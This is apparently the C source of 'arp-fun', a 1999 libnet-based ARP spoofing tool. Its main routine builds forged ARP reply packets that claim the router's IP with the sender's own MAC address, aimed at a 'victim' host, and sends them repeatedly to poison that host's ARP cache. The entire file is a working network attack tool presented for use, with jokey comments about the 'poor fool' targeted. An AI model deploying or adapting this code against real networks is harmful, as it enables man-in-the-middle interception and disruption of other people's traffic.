
/*  
 * String to Hw addr translation (and others) borrowed from:
 *     ARPTool v0.1, (c) Cristiano Lincoln Mattos, 
 *     1999 - <lincoln@hotlink.com.br>
 * 
 * Libnet is grrrrrreat ! thank's route.
 * 
 * Stevens R.I.P., thank's TCP/IP Illustrated I,II,III.
 * 
 * Have lot's of fun !!
 * 
 * (c) 1999 ulandron.
 * 
 */
#include "arp-fun.h"

int libnet_do_arp (struct libnet_link_int *, u_char *, struct ether_addr *, u_long,
		   char *);
unsigned char *str_to_hwaddr (char *str);
unsigned int hexstr_to_int (char *cptr);

void usage (char *name);

int
main (int argc, char **argv)
{
  int c, nbytes, count = 1, verbose = FALSE;
  u_int secs = 0;
  u_char *pkt, ebuf[BUFSIZ];
  struct sockaddr_in local;
  struct libnet_link_int *link;	/* Our requested IF */
  u_char *dev = NULL;		/* Interface we wanna use */
  u_long dst_ip = 0;		/* Victims ip */
  u_long src_ip = 0;		/* Our ip */
  struct ether_addr *local_mac = NULL;
  struct ether_addr *remote_mac = NULL;
  struct ether_addr e;
  char temp[20];

  if (getuid () || geteuid ())
    {
      printf
	("Hmm, I think you need rewt privileges to open a link interface\n");
      exit (1);
    }

  /* Oh my GOD, they killed kenny !!!!! */

  while ((c = getopt (argc, argv, "x:hvVi:c:d:s:m:a:")) != EOF)
    {
      switch (c)
	{
	case 'V':
	  printf ("Arp-fun (c) 1999 ulandron, Version: %s\n", VERSION);
	  exit (0);
	  break;
	case 'h':
	  usage (argv[0]);
	  break;		// Heh
	case 'x':
	   secs = atoi (optarg);
	  break;
	case 'v':
	  verbose = TRUE;
	  break;
	case 'i':
	  dev = optarg;
	  break;
	case 'c':
	  count = atoi (optarg);
	  break;
	case 'd':
	  dst_ip = libnet_name_resolve (optarg, 0);
	  if (!dst_ip)
	    {
	      perror ("libnet_name_resolve");
	      exit (-1);
	    }
	  break;
	case 's':
	  src_ip = libnet_name_resolve (optarg, 0);
	  if (!src_ip)
	    {
	      perror ("libnet_name_resolve");
	      exit (-1);
	    }
	  break;
	case 'm':
	  remote_mac = (struct ether_addr *) str_to_hwaddr (optarg);
	  break;
	case 'a':
	  local_mac = (struct ether_addr *) str_to_hwaddr (optarg);
	  break;
	default:
	  exit (-1);
	}
    }

  if (count < 1 || count > 100 || (!dst_ip))	// || (remote_mac == NULL))
    {
      usage (argv[0]);
    }
  if (verbose)
    printf ("Attempting to send %d packets\n", count);

  if ((libnet_init_packet (LIBNET_ARP_H + LIBNET_ETH_H, &pkt)) == -1)
    {
      perror ("libnet_init_packet");
      exit (-1);
    }

  if (dev == NULL)
    {
      memset ((char *) &local, 0, sizeof (struct sockaddr_in));
      local.sin_family = AF_INET;
      local.sin_port = htons (0);
      local.sin_addr.s_addr = INADDR_ANY;

      if (
	  (libnet_select_device
	   ((struct sockaddr_in *) &local, (u_char **) & dev, ebuf)) == -1)
	{
	  fprintf (stderr, "libnet_select_device:%s\n", ebuf);
	  exit (-1);
	}
    }

  if (
      (link = (struct libnet_link_int *) libnet_open_link_interface (dev,
								     ebuf)) ==
      NULL)
    {
      fprintf (stderr, "libnet_open_link_interface: %s\n", ebuf);
      exit (-1);
    }
#ifdef DEBUG
  printf ("Successfully open: %s\n", dev);
#endif

  /* Can't happen at this moment, still working on this */
  /* Perhaps fork this one ? */
  /* How do I get back the mac ? pipes ? */
  if (remote_mac == NULL)
    {
      c = libnet_do_arp (link, dev, &e, dst_ip, temp);
      if (c == -1)
	{
	  printf
	    ("There could be an error getting remote mac, please specify with -m\n");
	}
      remote_mac = (struct ether_addr *) str_to_hwaddr (temp);
    }


  if (!src_ip)
    {
      src_ip = htonl (libnet_get_ipaddr (link, dev, ebuf));

      if (!src_ip)
	{
	  fprintf (stderr, "libnet_get_ipaddr: %s\n", ebuf);
	  exit (-1);
	}
    }

  if (verbose)
    {
      printf ("Source ip: %s\n", (libnet_host_lookup (src_ip, 1)));
      printf ("Dest   ip: %s\n", (libnet_host_lookup (dst_ip, 1)));
    }
  if (local_mac == NULL)
    {

      if (
	  (local_mac =
	   (struct ether_addr *) libnet_get_hwaddr (link, dev, ebuf)) == NULL)
	{
	  fprintf (stderr, "libnet_get_hwaddr: %s\n", ebuf);
	  exit (-1);
	}
    }

  printf ("Everything fine, 'til now. Let's build the packet\n");

  libnet_build_ethernet ((u_char *) remote_mac, (u_char *) local_mac, ETHERTYPE_ARP,	/* Our packet will contain ARP info */
			 NULL,	/* No extra payload */
			 0, pkt);	/* Allocated mem for packet */

  libnet_build_arp (ARPHRD_ETHER,	/* Address format */
		    ETHERTYPE_IP,	/* Protocol format */
		    ETHER_ADDR_LEN,	/* HW len */
		    0x4,	/* Prot len */
		    ARPOP_REPLY,	/* Op, Arp reply */
		    (u_char *) local_mac,	/* My HW addr */
		    (u_char *) & src_ip,	/* Our IP == Router's IP */
		    (u_char *) remote_mac,	/* Yer HW */
		    (u_char *) & dst_ip,	/* Poor fool */
		    NULL,	/* Opt payload */
		    0,		/* sizeof(payload) */
		    pkt + LIBNET_ETH_H);
  if (verbose)
    {
      printf ("Looks nice, huh:");
      libnet_hex_dump (pkt, LIBNET_ETH_H + LIBNET_ARP_H, 0, stdout);
    }
  for (c = 0; c < count; c++)
    {

      if ((nbytes = libnet_write_link_layer (link, dev, pkt, LIBNET_ARP_H + LIBNET_ETH_H)) <
	  0)
	{
	  perror ("write link");
	  exit (-1);
	}

      if (secs)
	sleep (secs);
      if (verbose)
	printf ("Sent packet %d, waiting %d seconds\n", c + 1, secs);

    }

  if ((libnet_close_link_interface (link)) == -1)
    {
      perror ("close link");
      exit (-1);
    }

  libnet_destroy_packet (&pkt);
  if (!verbose)
    printf ("Packet sent, memory freed, link closed; see ya!\n");
  exit (0);
}
